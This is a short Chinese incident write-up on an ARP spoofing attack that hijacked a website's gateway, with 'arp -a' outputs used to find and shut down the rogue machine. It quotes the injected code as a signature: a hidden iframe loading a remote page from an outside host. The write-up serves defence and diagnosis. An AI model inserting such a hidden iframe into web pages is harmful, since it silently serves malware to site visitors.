近期电脑软硬件应用网所在服务器受到arp欺骗攻击,路由被劫持。
挂马特征: 在头部加入如下代码:
<iframe style='display:none;' src=http://cool.47555.com/k.htm></iframe> |
解决和分析过程(借鉴绿盟路由被劫持案例):
被攻击时
x:\Documents and Settings\Administrator>arp -a Interface: *.123.71.119 --- 0x2 Internet Address Physical Address Type 58.123.71.1 00-13-60-*-8e-c2 dynamic Interface: *.123.225.231 --- 0x3 Internet Address Physical Address Type 222.123.225.2 00-15-c5-ec-e2-8d dynamic 222.123.225.* 00-c0-*-82-5c-fa dynamic |
00-15-c5-ec-e2-8d 这个机器冒充网关,劫持了电脑软硬件应用网 然后查内网的机器发现 00-15-c5-ec-e2-8d 就是 *.123.225.232 和电脑软硬件应用网的服务器同一网段 于是立即关闭该机器,刷新arp,恢复正常
正常后查询arp 结果如下
x:\Documents and Settings\Administrator>arp -a Interface: *.123.71.119 --- 0x2 Internet Address Physical Address Type 58.123.71.1 00-13-60-*-8e-c2 dynamic Interface: *.123.225.231 --- 0x3 Internet Address Physical Address Type 222.123.225.2 00-0e-38-6e-*-bf dynamic | 网关从 00-15-c5-ec-e2-8d 恢复为 00-0e-38-6e-*-bf 网站也恢复正常了
|